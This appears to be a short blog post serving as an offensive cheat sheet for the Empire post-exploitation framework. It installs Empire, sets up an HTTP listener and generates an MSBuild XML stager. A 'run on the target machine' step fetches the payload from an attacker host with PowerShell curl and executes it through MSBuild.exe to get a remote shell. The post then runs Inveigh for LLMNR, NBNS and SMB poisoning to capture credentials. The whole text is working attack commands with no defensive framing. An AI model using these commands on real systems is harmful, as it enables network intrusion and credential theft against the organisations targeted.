https://github.com/BC-SECURITY/Empire/releases
#installing Empire
apt-get install autoconf
tar -xzfv empire.tar.gz
cd setup && ./install
cd ../
./empire
Reverse Shell to Empire
Uselistener http
(Empire: listeners/http) > set BindIP 10.10.10.10
(Empire: listeners/http) > set Name 10.10.10.10
(Empire: listeners/http) > set Port 8001
(Empire: listeners/http) > execute
Getting the shell back
usestager windows/launcher_xml
set Listener http
set OutFile /root/a.xml
#on the target machine run
powershell curl http://10.10.10.12:8002/a.xml -outfile a.xml
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe c:\users\bhanu\a.xml
Running Inveigh on Empire
Agents
Interact [ID]
usemodule collection/inveigh
(Empire: powershell/collection/inveigh) > set SMB Y
(Empire: powershell/collection/inveigh) > set LLMNR Y
(Empire: powershell/collection/inveigh) > set NBNS Y
(Empire: powershell/collection/inveigh) > set Proxy Y
(Empire: powershell/collection/inveigh) > set IP 10.100.11.101
(Empire: powershell/collection/inveigh) > set HTTPResponse
<html><head><meta http-equiv='refresh' content='0; url=http://10.100.11.101'></head></html>
(Empire: powershell/collection/inveigh) > set RunTime 10
(Empire: powershell/collection/inveigh) > execute
Comments
Post a Comment